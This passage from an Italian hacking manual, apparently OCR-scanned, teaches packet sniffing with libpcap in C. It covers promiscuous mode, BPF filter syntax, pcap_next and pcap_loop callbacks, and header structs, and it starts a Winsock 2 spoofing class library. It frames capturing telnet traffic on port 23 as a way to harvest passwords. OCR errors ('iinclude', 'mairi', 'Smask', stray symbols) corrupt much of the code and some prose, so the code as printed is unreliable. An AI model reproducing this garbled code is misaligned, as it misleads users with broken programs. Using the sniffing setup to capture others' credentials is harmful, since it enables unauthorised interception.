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Le due tecniche sono molto differenti come tecnica. 

Nel modo standard ovvero quello non promiscuo lo sniffer su di un host cattura solo il traffico 
direttamente inviato a lui. 

Nell'altro modo, quello promiscuo, viene sniffato tutto il traffico che passa su un determinato 
segmento. 

Chiaramente il fatto che sia meglio uno o l'altro dipende esclusivamente dagli scopi stessi 
dello sniffing anche se di fatto si deve considerare che questa modalità è individuabile. 
Inoltre questo metodo funziona solo in un ambiente non-switched (come ad esempio su un 
hub, o uno switch). 

Un problema inoltre potrebbe esserci su reti a grosso flusso di dati. 

Molte volte la funzionalità dello sniffer interessa solo applicato ad un traffico specifico. 

Ad esempio potrebbero esserci delle volte che potremmo avere la necessità di sniffare solo la 

porta 23 legata telnet alla ricerca di password. 

Il filtraggio dei pacchetti che devono essere catturati può essere eseguito tramite l'uso di certe 
funzioni come ad esempio pcap_compile() e pcap_setfilter(). 
Il processo è semplice. 

Dopo aver richiamato la funzione pcap_open_live() ed aver lavorato sulla sessione di 
sniffing, possiamo applicare dei filtri. 

Ci si potrebbe chiedere come mai uno non può utilizzare dei controlli con if/else. 
Il primo motivo è che i filtri pcap sono molto più efficienti. 

Il secondo motivo è olto semplice in quanto prima di applicare il filtro dobbiamo compilarlo. 
L'espressione del filtro viene inserito in una stringa normalissima (un array di char) 
Per compilare il programma dobbiamo chiamare la fnzione pcap_compile(). 
Nel prototipo viene definita come : 

int pcap_compile (pcap_t *p, struct bpf_program *fp, char *str, int 
optimize, bpf_u_±nt32 netmask) 

Il primo argomento è l'handle della sessione, il secondo è il riferimento di dove mettere la 
versione compilata del nostro filtro, il terzo è di fatto l'espressione del filtro, il quarto è un flag 
che dice se la stringa deve essere ottimizzata e infine l'ultimo argomento che deve essere la 
net mask della rete dove il filtro deve essere applicato. 
La funzione restituisce -1 in caso di errore mentre qualsiasi altro valore indica un successo. 
Dopo che l'espressione è stata compilata questa deve essere applicata. 
pcap_setfilter() è la funzione per eseguire questo scopo. 
Il suo prototipo è : 

int pcap_setf±lter(pcap_t *p, struct bpf jprogram *fp) 

Il primo argomento è il solito handler alla sessione, il secondo è il riferimento alla versione 
compilata dell'espressione (presubilmente la stessa variabile del secondo argomento di 
pcap_compile()). 

Un esempio che potrebbe aiutare a capire : 

iinclude <pcap . h> 

pcap_t *handle; /* Sesslon handle */ 

char dev[] = "rlO"; /* Device to sniff ori */ 

char errbuf [PCAP_ERRBUF_SIZE] ; /* Error string */ 

struct bpf__program filter; /* The compiled filter expression */ 

char filter_app[] = "port 23"; /* The filter expression */ 

bpf_u_int32 mask; /* The netmask of our sniffing device */ 

bpf_u_int32 net; /* The IP of our sniffing device */ 

pcap_lookupnet (dev, &net, Smask, errbuf); 

handle = pcap_open_live (dev, BUFSIZ, 1, 0, errbuf); 

pcap_compile (handle, & filter, filter_app, 0, net) ; 

pcap_set filter (handle, & filter) ; 

Il programma prepara lo sniffer a sniffare il traffico utilizando la porta 23, in modo promiscuo, 
sul device MO. 
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Nell'esempio esiste una funzione che non abbiamo ancora visto e precisamente 
pcap_lookupnet() la quale partendo da un nome del device restituisce I' IP e la sua 
NETMASK. 



Lo snif f ing 

A questo punto abbiamo visto come definire un device, prepararlo per lo sniffing e applicargli 
un filtro, quindi è ora di eseguire lo sniffing vero e proprio. 
Esistono due tecniche fondamentali per fare questo. 

Possiamo catturare un singolo pacchetto per volta oppure possiamo entrare in un loop che 
attende un certo numero n di pacchetti. 

Inizieremo vedendo come sniffare un singolo pacchetto e poi passeremo a vedere come 
eseguire un loop. 

Per questo scopo utilizzeremo la funzione pcap_next(). 
Il suo prototipo è : 



u_char *pcap_next (pcap_t *p, struct pcap _pkthdr *h) 



Il primo argomento è l'handler alla nostra sessione. 

Il secondo è un puntatore alla struttura che contiene le informazioni generali del pacchetto 
come il tempo in cui questo è stato sniffato, la sua lunghezza e la lunghezza dell'eventuale 
porzione nel caso in cui questo sia frammentato. 

pcap_next() ritorna un puntatore u_char al pacchetto che è descritto dalla sua struttura. 
Quella che segue è una dimostrazione di come può essere usata la funzione pcap_next() per 
sniffare un pacchetto. 

iinclude <pcap.h> 
iinclude <std±o.h> 
int mairi () 



{ 



pcap_t *handle; 
char *dev; 

char errbuf [PCAP_ERRBUF_SIZE ] ; 
struct bpf_program filter; 
char f±lter_app[] = "port 23"; 
bpf_u_int32 mask; 
hpf_u_int32 net; 
struct pcap _pkthdr header; 
const u_char *packet; 



Se s sion handle */ 
The device to sniff on */ 
Error string */ 
The compiled filter */ 
/* The filter expression */ 
/* Our netmask */ 
Our IP */ 

The header that pcap gives us */ 
The actual packet */ 
De fine the device */ 



/* 
/* 
/* 
/* 



/* 
/* 
/* 
/* 



dev = pcap_lookupdev (errbuf ) ; 

/* Find the properties for the device */ 
pcap_lookupnet (dev , &net, Smask, errbuf); 
/* Open the session in promiscuous mode */ 
handle = pcap_open_live (dev, BUFSIZ, 1, 0, errbuf); 
/* Compile and apply the filter */ 
pcap_compi le (handle, & filter, filter_app, 0, net); 
pcap_set filter (handle, & filter) ; 

/* Grab a packet */ 
packet = pcap_next (handle, Sheader) ; 

/* Print its length */ 
printf ("Jacked a packet with length of [%d]\n", header. lezi); 

/* And dose the session */ 

pcap_close (handle) ; 
return (0) ; 



Questa applicazione sniffa su qualsiasi device restituito da pcap_lookupdev() inserendo 
questo in modo promiscuo. 

Questa funzione trova il primo pacchetto sulla porta 23 (telnet) e dice all'utente la dimensione 
del pacchetto in bytes. 

Questo programma include una nuova chiamata alla funzione pcap_close() la quale verrà 
vista successivamente ma che di fatto comunque non è difficile da comprenderne lo scopo. 
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La successiva tecnica utilizzata per sniffare è un pò più complessa ma allo stesso tempo è 
sicuramente più utilizzata. 

Pochi sniffer (se ce n'e' qualche d'uno) utilizzano pcap_next(). 
Molto più spesso questi utilizzano pcap_loop() o pcap_dispatch(). 

Per capire l'uso di queste funzioni dovete avere ben presente il concetto di funzioni callback. 
Questo tipo di funzioni sono molto comuni tra quelle relative alle API. 
Il loro concetto è abbastanza semplice. 

Supponiamo di avere un programma che stia attendendo un evento di qualsiasi tipo. 

Per lo scopo di quest'esempio, supponiamo di volere che l'utente prema un tasto sulla 

tastiera. 

Ogni qual volta che viene premuto un tasto, potremmo desiderare che venga chiamata una 

funzione che determini quello che è stato fatto. 

La funzione utilizzata viene chiamata callback function. 

Ogni volta che l'utente preme un tasto il programma richiama la funzione callback. 

Questo tipo di funzioni sono usate in pcap, ma invece che essere chiamate quendo viene 

premuto un tasto, queste sono chiamate quando pcap sniffa un pacchetto. 

Le due funzioni che uno può utilizzare per definire il loro callback è pcap_loop() e 

pcap_dispatch(). pcap_loop() e pcap_dispatch() sono molto simili a riguardo dell'uso delle 

callbacks. 

Il prototipo di pcap_loop() è il seguente: 



Il primo argomento è l'handle alla sessione mentre il secondo argomento è il numero di 
pacchetti che devono essere sniffati. 

Il terzo argomento è la funzione di callback mentre l'ultimo argomento viene utilizzato solo da 
alcune funzioni mentre spesso è settato a NULL. 

La differenza tra pcap_dispatch() e pcap_loop() è la modalità con cui manipola i timeouts. 
pcap_loop() ignora il timeout mentre pcap_dispatch() non lo fa. 

Prima di poter vedere un esempio d'uso di questa funzione è necessario vedere il formato 
della funzione di callback. 

Non è possibile definire arbitrariamente il suo prototipo, altrimenti, pcap_loop() potrebbe non 
conoscere come usarre la funzione. 

Così possiamo usare questo prototipo come funzione di callback: 



Vediamola in maggior dettaglio. 

Per prima cosa si deve osservare che la funzione possiede un tipo VOID di ritorno. 

Questo è logico dato che pcap_loop() potrebbe non conoscere come gestire un valore di 

ritorno. 

Il primo argomento corrisponde all'ultimo argomento di pcap_loop(). 

Qualsiasi valore venga passato come ultimo argomento a pcap_loop() questo viene passato 
come primo argomento alla nostra funzione di callback ogni volta che la fnzione è chiamata. 
Il secondo argomento è una struttura relativa all'header pcap, il quale contiene le informazioni 
relative a quando il pacchetto deve essere sniffato, quante grande, ecc. 
La struttura pcap_pkthdr è definita come : 

struct pcap_pkthdr { 

struct tlmeval ts; /* tinte stamp */ 

bpf_u_±nt32 caplen; /* length of portion present */ 
bpf_u_±nt32 len; /* length thls packet (off wire) */ 



I campi si autospiegano da soli. 

L'ultimo argomento è il più interessante di tutti e quello che potrebbe confondere di più. 
Questo è un altro puntatore a u_char, e contiene l'intero pacchetto, come viene sniffato da 
pcap_loop(). 

Ma come è possibile usare questa variabile ? 
Un pacchetto contiene molti attributi. 
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Questa non è di fatto una stringa come potrebbe fare pensare I' u_char ma una collezione di 

strutture (per esempio l'header Ethernet, l'header IP, l'header TCP, e cosi via). 

Dentro a include/netinet è possibile vedere la configurazione di queste strutture destinate a 

rappresentare questi header. 

Queste sono : 



/* Ethernet header */ 

struct sniff_ethernet { 

u_char ether_dhost [ETHER_ADDR_LEN] ; /* Destination host address */ 
u_char ether_shost [ETHER_ADDR_LEN] ; /* Source host address */ 
u_short ether_type; /* IP? ARP? RARP? etc */ 

}; 

/* IP header */ 
struct sn±ff_±p { 

§if B YTE_ ORDER == LITTLE_ENDIAN 

u_int ±p_hl:4, /* header length */ 

±p_v:4; /* verslon */ 

ttif B YTE_ ORDER == BIG_ENDIAN 

u_int ±p_v:4, /* verslon */ 

±p_hl:4; /* header length */ 

tendi f 

tiendlf /* not _IP_VHL */ 

u_char ip_tos; /* type of servlce */ 

u_short lp_len; /* total length */ 

u_short lp_id; /* Identification */ 

u_short ip_off; /* fragment offset field */ 

#define IP_RF 0x8000 /* reserved fragment flag */ 

#define IP_DF 0x4000 /* dont fragment flag */ 

#define IP_MF 0x2000 /* more fragments flag */ 

Itdefine IP_OFFMASK Oxlfff /* mask for fragmenting bits */ 

u_char ip_ttl; /* time to live */ 

u_char ip _p; /* protocol */ 

u_short ip_sum; /* checksum */ 

struct in_addr ip_src, ip_dst ; /* source and dest address */ 

}; 

/* TCP header */ 
struct sniff_tcp { 

u_short th_sport; /* source port */ 

u_short th_dport; /* destination port */ 

tcp_seq th_seq; /* sequence number */ 

tcp_seq th_ack; /* acknowledgement number */ 

#if B YTE_ ORDER == LITTLE_ENDIAN 

u_int th_x2:4, /* (unused) */ 

th_off:4; /* data offset */ 

tendi f 

§if B YTE_ ORDER == BIG_ENDIAN 
u_int th_off:4, /* data offset */ 
th_x2:4; /* (unused) */ 
tiendif 

u_char th_flags; 
itdefine TH_FIN 0x01 
itdefine TH_SYN 0x02 
itdefine TH_RST 0x04 
itdefine TH_PUSH 0x08 
itdefine TH_ACK 0x10 
itdefine TH_ URG 0x20 
itdefine TH_ECE 0x40 
itdefine TH_CWR 0x80 

itdefine TH_FLAGS (TH_FIN I TH_SYN / TH_RST / TH_ACK \ TH_ URG / TH_ECE I TH_CWR) 
u_short th_win; /* window */ 
u_short th_sum; /* checksum */ 
u_short th_urp; /* urgent pointer */ 



Ma com'è possibile destrutturare un sempliuce u_char in tutte queste strutture ? 
Questo è possibile farlo definendo delle variabili nel seguente modo: 
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const struct sniff_ethernet *ethernet; /* The ethernet header */ 
const struct sn±ff_±p *lp; /* The IP header */ 
const struct sn±ff_tcp *tcp; /* The TCP header */ 
const char *payload; /* Packet payload */ 

/* For readablllty, we '11 make varlables for the slzes of each of the 
structures */ 

Int slze_ethernet = slzeof (struct snlff_ethernet) ; 




E ora i CAST : 



ethernet = (struct sniff_ethernet*) (packet) ; 

ip = (struct sniff_lp*) (packet + size_ethernet) ; 

tcp = (struct sn±ff_tcp*) (packet + s±ze_ethernet + size_ip) ; 

payload = (u_char *) (packet + size_ethernet + size_ip + size_tcp) ; 

Come fnziona questo ? 

Consideriamo il layout dei pacchetti u_char in memoria. 

Basicamente tutto quello che avviene quando pcap riempie queste strutture in un u_char è 
che tutti I dati contenuti in queste sono inserite in una stringa, e la stringa viene passata alla 
funzione callback. 

La cosa conveniente è che nonostante I valori settati dentro a queste strutture, le loro 
dimensioni rimangono sempre le stesse. 

Sulla mia eworkstation ad esempio una struttura sniff_ethernet ha come dimensione 14 
bytes. 

Una struttura sniff ip è 20 bytes, e allo stesso modo, una struttura a snifMcp è anche lei 20 
bytes. 

Il puntatore u_char è realmente solo ujna variabile che contiene un indirizzo di memoria. 
Al fine di mantenere le cose semplici, noi diciamo che l'indirizzo di questo puntatore è setato 
al valore X. 

Bene, se le nostre tre strutture sono state settate in linea, la prima di loro (sniff_ethernet) 
inizia ad essere allocata in memoria all'indirizzo X, cosi che possiamo trovare l'indirizzo delle 
altre strutture. 

Vediamo gli spianamenti dal grafico : 



Variable 


Location (in bytes) 


sniff_ethernet 


X 


sniffip 


X+ 14 


snifMcp 


X+ 14 + 20 







La struttura sniff_ethernet è al'indirizzo X. 

sniffjp è alla locazione X più la dimensione di quanto occupa sniff_ethernet consumes. 
snifMcp è dopo sia sniffjp e sniff_ethernet, e quindi alla locazione X più la disnione di tutte 
e due le strutture. 

Dopo aver visto le funzioni rivediamo le linee relative al pacchetto di DUMP. 
Per eseguire il DUMP dobbiamo eseguire le seguenti funzioni : 

Inizializzazione dell'interfaccia 

Scrittura della funzione che scrive i dati ricevuti che verrà settata come funzione callback 
Settaggio di questa funzione all'interno della funzione pcapjoop. 

La prima parte viene eseguita con : 



La funzione che invece verrà settata come callback e che stamperà con una semplice printf I 
dati è : 
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void d±spatcher_handler (u_char *templ, const struct pcap_pkthdr *header, 

const u_char *pkt_data) 

{ 

u_int 1=0; 

//print pkt timestamp and pkt len 

prlntf ("%ld: %ld (%ld)\n", header->ts . tv_sec, header->ts .tv_usec, 
header->len) ; whlle ( (1<MAX_PRINT) && (±<header->len) ) 

{ 

i++; 

prlntf ("%x ", pkt_data[l] ) ; 

If ( (1%MAX_LINE) == 0) printf ("\n") ; 

} 

printf ("\n\n") ; 



Ora l'ultima istruzione sarà appunto quella di settare la funzione di callback con : 
pcap_loop (fp, 0, dispatcher_handler, NULL) ; 
Il programma per intero l'abbiamo visto alcune pagine prima. 

I questa ulteriore sezione vedremo come utilizzare le librerie viste in questo capitolo per 
affrontare problemi classici risolvibili con queste. 
Consideriamo la seguente funzione : 

• int pcap_loop(pcap_t *p, int cnt, pcap_handler callback, u_char *user) 

Qyesta verrà utilizzata per risolvere la problematica di base del nostro engine. 

Quando pcap_loop(..) viene chiamata questa cattura il numero cnt di pacchetti e li passa a 

quella definita come funzione di callback.la quale è di tipo pcap_handler. 

Ora diamo un occhiata al file d'header: 

typedef void (*pcap_handler)(u_char *, const struct pcap_pkthdr *, const u_char *); 

In questa definizione siamo interessati agli argomenti 2 e 3, la struttura pcap packet header e 
la const u_char che rappresenta il pacchetto. 

Cosi tanto per fare una prova scriviamo un piccolo esempio che esegua il loop prendendo un 
numero n di pacchetti. 

/****************************** 

* file: testpcap2 . c 

* date: 2001-Mar-14 12:14:19 AM 

* Author: Martin Casado 

* Last Modified: 2001-Mar-14 12:14:11 AM 
* 

* Description: Q&D proggy to demonstrate the use of pcap_loop 
* 

******************************************* 

§ include <pcap . h> 
iinclude <stdio.h> 
^include <stdlib.h> 
^include <errno.h> 
iinclude <sys/socket . h> 
iinclude <netinet/in . h> 
iinclude <arpa/inet . h> 
iinclude <netinet/if_ether.h> 

/* callback function that is passed to pcap_loop ( . . ) and called each time 

* a packet is recieved 
*/ 

void iay_callback (u_char *useless, const struct pcap_pkthdr* pkthdr , const 
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{ 

statlc int count = 1; 
fpr±ntf(stdout,"%d, ", count); 
If (count == 4) 

fprintf (stdout, "Come on baby sayyy you love me! ! ! ") ; 
If (count == 7) 

fprintf (stdout, "Tiiimmmeesss ! ! ") ; 
fflush (stdout) ; 
count++; 

} 

int mainfint argc,char **argv) 
{ 

int i; 
char *dev; 

char errbuf [PCAP_ERRBUF_SIZE] ; 

pcap_t* descr; 

const u_char *packet; 

struct pcap _pkthdr hdr; /* pcap . h */ 

struct ether_header *eptr; /* net/ethernet . h */ 

if (argc != 2) ( fprintf (stdout, "Usage : %s numpackets\n" , argv [0] ) ; return 

0;} 

/* grab a device to peak into. . . */ 
dev = pcap_lookupdev (errbuf ) ; 
if(dev == NULL) 

{ printf ("%s\n" , errbuf) ; exit (1) ; } 
/* open device for reading */ 

descr = pcap_open_live (dev, BUFSIZ, 0, -1 , errbuf ) ; 
if (descr == NULL) 

{ printf ("pcap_open_live () : %s\n" , errbuf ) ; exit (1) ; } 

/* allright here we cali pcap_loop(. .) and pass in our callback function 

*/ 

/* int pcap_loop (pcap_t *p, int cnt, pcap_handler callback, u_char 
*user) */ 

/* If you are wondering what the user argument is ali about, so am I! ! 

*/ 

pcap_loop (descr, atoi (argv[l ] ) , my_callback, NULL) ; 



fprintf (stdout, "\nDone processing packets . . . wheew! \n") ; 




[root@pepe libpcap]# gcc testpcap2.c -Ipcap 
[root@pepe libpcap]# ./a.out 7 

Ora diamo un occhiata alla fnzione my_callback(...) la quale viene attualemnte chiamata 7 
volte. 

Il problema legato all'uso di pcap_loop(..) è che questa blocca tutto indefinitivamente se 
nessun pacchetto può essere letto. 

Questo potrebbe indurci a pensare che sarebbe meglio mettere un timeout sulla funzione di 
lettura. 

Andando a vedere come era stata aperta la connessione con pcap_open_live(..) potremmo 

vedere che uno degli argomenti specificava il timeouts in miliisecondi. 

pcapjoop attualemnte ignora questo argomento ma pcap_dispatch(..) non lo fa. 

In questo modo possiamo volere che nel nostro loop principale pcap_loop() venga sostituito 

con pcap_dispatch(). 

In molte applicazioni che utilizzano il packet capture non è detto che uno sia interessato a 
qualsiasi pacchetto ricevuto. 

EntEsistono due funzioni che permettono di settare dei filtri e precisamente pcap_compile(..) 
e pcap_setfilter(...). 

Precedentemente avevamo visto l'uso di queste funzioni ,ma avevamo tralasciato quella che 
era la sintassi per la creazione dei filtri che potevano essere compilati e poi settati. 
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Le espressioni creabili consistono in una o più primitive precedute da uno o più qualificatori. 

type qualiticatore il quale dice a quale tipo di cosa il 'id name' o il 'number' si riferisce. 
Tipi possibili sono host, net e port. Es : 'host foo', 'net 128.3', 'port 20'. 
Se non esiste un specificatore viene assunto di default host. 

dir qualificatore specifica una direzione di trasferimento verso e/o da un ID. 

Direzioni possibili sono src, dst, src o dst and src and dst. 
Es: 'src foo', 'dst net 128.3', 'src o dst port ftp-data'. 
Se non esiste specificatore viene assunto, src o dst 
Per 'nuli' link layers il qualificatore inbound e outbound possono essere 
Utilizzati per specificare la direzione 

proto qualificatore restringe la misura ad un particolare protocollo. 

Sono possibili: ether, fddi, ip, arp, rarp, decnet, lat, sca, moprc, mopdl, tcp e 
udp. 

Es: 'ether src foo', 'arp net 1 28.3', 'tcp port 21 '. 

Se non viene specificato il qualificatore sono assunti tutti i protocolli specificati con 
il tipo. 

Es: 'src foo' intende '(ip o arp o rarp) src foo', 'net bar' significa '(ip or arp o rarp) 
net bar' e 'port 53" significano '(tcp or udp) port 53'. 

Le primitive sono: 

dst host host 

Vero se il campo IP destination è un host, il quale potrebbe essere un indirizzo o 
un nome. 

src host host 

Vero se il campo IP source del pacchetto è un host. 

host host 

Vero se l'IP sorgente o destinazionbe del pacchetto è un host. 

Qualsiasi delle espressioni host possono essere pre-apposti con le parole ip, arp, o 

rarp come negli esempi: 

ip host host 

il quale è l'equivalente di: 
ether proto \ip and host host 

Se host è un nome con più indirizzi IP ogni indirizzo viene marcato per una ricerca. 

ether dst ehost 

Vero se l'indirizzo di destinazione è un ehost. 

Ehost può essere un nome come da /etc/ethers o un numero 

ether src ehost 

Vero se si tratta di un indirizzo sorgente ethernet è ehost. 

ether host ehost 

Vero se uno dei due indirizzi sorgente o destinazione ethernet sono ehost. 

gateway host 

Vero se il pacchetto è usato come gateway. 

Host deve essre un numero o un nome presente in tutti e due i file 

/etc/hosts e /etc/ethers. 

dst net net 

Vero se l'IP di destinazione del pacchetto possiede un numero di lavoro di rete 
Può' essere un numero o un nome da /etc/net 

src net net 
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Vero se l'indirizzo di sorgenteha un numero di rete del net. 

net net 

Vero se l'IP sorgente ha un numero di rete del net. 

net net mask mask 

Vero se l'IP confronta net con la net mask specificata. 

net net/len 

Vero se l'IP confronta net con la netmask len. 
dst port port 

Vero se il pacchetto è ip/tcp o ip/udp e possiede come destinazione un numero di 
porta port.. Il valore port può essere un numero o un nome preso da 
/etc/services 

src port port 

Vero se il pacchetto ha come sorgente di porta port. 

port port 

Vero se uno dei due (sorgente o destinazione) del pacchetto è port. 

Qualsiasi delle seguenti espressioni possono essere pre-apposte con le keywords, 

tcp or udp, come nell'esempio: 

tcp src port port 

less length 

Vero se il pacchetto gha una lunghezza length minore o uguale a length. 
Questo è l'equivalente di : 
len <= length. 

greater length 

Come sopra ma con l'espressione 
len >= length. 

ip proto protocol 

Vero se il pacchetto è un pacchetto IP di tipo protocollo protocol. 

Protocol può esere un numero o un nome icmp, igrp, udp, nd, o tcp. 

Notate che l'identificatore tcp, udp, e icmp sono anche keywords e devono 

essere escaped mediante backslash (\), il quale è trasformato in \\ con la 

C-shell. 

ether broadcast 

Vero se il pacchetto è un pacchetto di broadcast ethernet. 
La seconda keyword è opzionale. 

ip broadcast 

Vero se il pacchetto è un pacchetto di broadcast 

ether multicast 

Vero se il pacchetto è un pacchetto ethernet di multicast. 

ip multicast 

Vero se il pacchetto è un pacchetto IP multicast. 

ether proto protocol 

Vero se il pacchetto è relativo al protocollo di tipo ether. 

Il protocollo può essere un numero o un nome tipo ip, arp, o rarp. 

Notate che questi identificatori sono anche keywords e devono essere escaped 

mediante backslash (\). 

ip, arp, rarp, decnet 
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Abreviazione per : ether proto p dove p è uno dei seguenti protocolli, 
tcp, udp, icmp 
Abbreviazione per: 
ip proto p 

expr relop expr 

Vero se la valutazione che usa >, <, >=, <=, =, !=, con I' expr . 

Per accedere ai dati dentro ad un pacchetto si usa la seguente sintassi: 

proto [ expr : size ] 

Proto è uno dei seguenti 

ether, fddi, ip, arp, rarp, tcp, udp, o icmp 

Le primitive possono essere combinate con : 

Un gruppo di primitive e operatori raggruppati 

Negazione (T o 'not'). 
Concatenazione ('&&' o 'and'). 
Avvicendamento f ||' o 'or'). 

Per esempio: 

not host vs and ace 

Esempi: 

tcpdump host sundown 
tcpdump host helios and \( hot or ace \) 
tcpdump ip host ace and not helios 
tcpdump net ucb-ether 

tcpdump 'gateway snup and (port ftp or ftp-data)' 
tcpdump ip and not net localnet 

tcpdump 'tcp[1 3] & 3 != 0 and not src and dst net localnet' 
tcpdump 'gateway snup and ip[2:2] > 576' 




/********************************************************************** 

* file: testpcap3 . c 

* date: Sat Apr 07 23:23:02 PDT 2001 

* Author: Martin Casado 

* Last Modified:2001-Apr-07 11:23:05 PM 
* 

* Investigate using filter programs with pcap_compile () and 

* pcap_set filter () 
* 

***************************************************************** 

iinclude <pcap . h> 
iinclude <stdio . h> 
iinclude <stdlib.h> 
^include <errno.h> 
^include <sys/socket . h> 
^include <netinet/in . h> 
iinclude <arpa/inet . h> 
iinclude <netinet/if_ether.h> 

/* just print a count every tinte we have a packet . . . 
*/ 

void my_callback (u_char *useless, const struct pcap_pkthdr* pkthdr , const 
u_char* 

packet) 
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{ 

statlc int count = 1; 
fpr±ntf(stdout,"%d, ", count); 
fflush (stdout) ; 
count++; 

} 

int mainfint argc,char **argv) 
{ 

int i; 
char *dev; 

char errbuf [PCAP_ERRBUF_SIZE ] ; 

pcap_t* descr; 

const u_char *packet; 



struct pcap _pkthdr hdr; /* pcap . h */ 

struct ether_header *eptr; /* net/ethernet . h */ 

struct bpf_program fp; /* hold compiled program */ 

bpf_u_int32 maskp; /* subnet mask */ 

bpf_u_int32 netp; /* ip */ 



iffargc .'= 2) { fprintf (stdout, "Usage: %s \"filter program\"\n" 
, argv[0] ); return 0; } 

/* grab a device to peak into. . . */ 
dev = pcap_lookupdev (errbuf ) ; 
if(dev == NULL) 

{ fprintf (stderr, "%s\n" , errbuf ) ; exit (1) ; } 

/* ask pcap for the network address and mask of the device */ 
pcap_lookupnet (dev, Snetp, Smaskp, errbuf) ; 

/* open device for reading this time lets set it in promiscuous 

* mode so we can monitor traffic to another machine */ 
descr = pcap_open_live (dev, BUFSIZ, 1, -1 , errbuf ) ; 
if (descr == NULL) 

{ printf ("pcap_open_live () : %s\n" , errbuf ) ; exit (1) ; } 

/* Lets try and compile the program. . non-optimized */ 

if (pcap_compile (descr, &fp, argv[l] , 0, netp) == -1) 

{ fprintf (stderr, "Error calling pcap_compile\n") ; exit(l); ) 

/* set the compiled program as the filter */ 
if (pcap_setfilter (descr, &fp) == -1) 

{ fprintf (stderr, "Error setting filter\n"); exit (1) ; } 
/* . . . and loop */ 

pcap_loop (descr, -1 , my_callback , NULL) ; 




[root@localhost libpcap] # gcc testpcap3.c -lpcap 

[root@localh.ost libpcap ]# . /a . out "host www. google . coiti " 

[root@localhost l±bpcap]# ./a. out "src 192.168.1.104" 

1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 

20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 

37, 38, 39, 40, 



Libreria TCP basata su W insock 2 

L'hacker necessita di un certo numero di Utilities le quali dovendo trattare pacchetti di dati 
devono in qualche modo interfacciarsi con i protocolli come ad esempio TCP. 
Esistono in circolazione un numero enorme di simili librerie sia statiche che dinamiche e 
anche in formato OCX. 
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Molte di queste sono a pagamento mentre altre vengono distribuite anche con sorgenti. 

Una di queste è una libreria scritta da Barak Weichselbaum la quale può essere utilizzata 

come base per qualsiasi tipo di software legato al trattamento dei pacchetti. 

TCP/IP è come ben sapete un protocollo che utilizza gli strati 3 e 4 del modello OSI per 

gestire le funzionalità di indirizzamento ed instradamento per trasferire informazioni su un 

sistema di rete. 



La libreria Winsock 2 è una raccolta di API che permette di trasferire queste 
informazioni su qualsiasi protocollo anche se alcune funzioni implementate in questo 
sono solo relative a TCP/IP come ad esempio gethostbyaddr(). 

La differenza sostanziale tra la prima versione di Winsock e questa è la possibilità di gestire 
protocolli multipli. 

La versione 1 .1 infatti gestiva solo TCP/IP e non IPX/SPX e altri. 

Winsock 2 gestisce inoltre anche il quality of service (QoS) e il multicasting. 

Qos nel campo della multimedialità permette di riservare una certa quantità di banda in modo 

che la qualità del servizio non sia inaccettabile. 

Un'altra importantissima caratteristica della versione 2 di Winsock è la completa integrazione 
con il meccsimo unificato di I/O di Win32. 

Questo fa si che sia possibile usare funzioni come ad esempio ReadFile() invece di recv(). 
Un ennesima caratteristica della versione 2 è quella chiamata Layered Service Providers la 
quale permette l'abilitazione di alcuni plug-ins legati alla security come ad esempio quelli 
relativi a SSL. 

In questo volume viene trattato anche Winsock in quanto questo è la base per la scrittura dei 
programmi che si agganciano alla trasmissione ramite protocollo anche se di fatto conviene 
sicuramente usare delle liberie scritte con questo come nel caso delle classi trattate in questo 
capitolo. 

Il tutto si compone di un certo numero di classi e precisamente : 

l^^ CAsyncSocket 

H ciCMPSocket 

J^L ciCMPSocketAsync 

Bcjnterfaces 
J^È ciPOptions 
^^È cSni ff Socket 
jU cSocket ThreadManager 
^^^ CSpoofBase 
l^È cSpoof Socket 
l^È cTCPOptions 
Ì^ CTCPSocket 

^LcTCPSocketAsync 

^CUDPSocket 
l^^ CUDP Socket Async 

Tutta questa serie di classi contengono tutte le funzioni di gestiuone dei vari protocolli come 
ad esempio TCP, ICMP e UDP. 

L'incapsulemento è fatto a partire dalla classe di base CspoofBase dalla quale derivano molte 

di quelle presenti nella libreria. 

La base di tutto è la libreria Winsock 2. 

Il link delle classi deve avvenire con la libreria ws2_32.lib la quale deve essere aggiunta nella 
lista di quelle collegate. 
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La prima da cui dipendono molte altre classi è la CSpoof Base 

ginclude <winsock2.h> 
ginclude <ws2tcpip.h> 

gdefine ERROR^HANDLER (METHOD_NAME) \ 
catch ( . . . ) \ 
i\ 

/*Get the last error*/\ 
ReportError (METHOD^NAME) ; \ 

} 

gdefine ERROR_HANDLER_RETURN (METHOD^NAME, RETURN_VALUE) \ 
catch ( . . . ) \ 
(\ 

/*Get the last error*/\ 
ReportError (METHOD_NAME) ; \ 
return RETURN_VALUE ; \ 

} 

//Manage static handlers 

gdefine ERROR_HANDLER_STATIC (CLASS^NAME, METHOD^NAME) \ 
catch ( . . . ) \ 
f\ 

/*Get the last error*/\ 

CSpoof Ba se : : ReportStati cError ( CLASS_NAME , METHOD_NAME) ; \ 

} 

gdefine ERROR_HANDLER STATIC_RETURN (CLASS_NAME, METHOD_NAME, RETURN VALUE) \ 
catch ( . . . ) \ 
(\ 

/*Get the last error*/\ 

CSpoof Ba se : : ReportStati cError (CLASS^NAME, METHOD_NAME) ; \ 
return RETURN_VALUE ; \ 

} 

gdefine ERROR HANDLER AMBIG (BASE^CLASS , METHOD NAME) \ 
catch ( . . . ) \ 
i\ 

/*Get the last error*/\ 

BASE__CLASS : : ReportError (METHOD__NAME ) ; \ 

} 

gdefine ERROR__HANDLER__AMBIG_RETURN (BASE_CLASS,METHOD_NAME, RETURN_VALUE) \ 
catch ( . . . ) \ 
<\ 

/*Get the last error*/\ 

BASE^CLASS : : ReportError (METHOD__NAME ) ;\ 
return RETURN_VALUE ; \ 

} 

//Handles basic errors 

class CSpoofBase 

{ 

public: 

//The external log 
class CSpoofLog 
{ 

friend class CSpoofBase; 

public: 

//et or and dtor 
CSpoofLog () ; 
virtual ~CSpoofLog(); 
protected: 

//Report an error must overide 

virtual void ReportCatchError (LPCSTR lpClass , LPCSTR lpMethod, LPCSTR 

lpMessage) =0; 

virtual void ReportlnitiatedError (LPCSTR lpClass , LPCSTR lpMethod, LPCSTR 

lpMessage) =0; 

virtual void ReportSocketError (LPCSTR lpClass, LPCSTR lpMethod, int 

iErrorCode) =0; 

ì; 

public: 

//Set the locai log 

void SetLocalLog (CSpoof Log* pLog) ; 

//Convert long to string 

char FAR * LongToString (long lAddr) ; 

//Save a new log 

void SetLog (CSpoof Log* pLog) ; 

//Initialize the sockets 

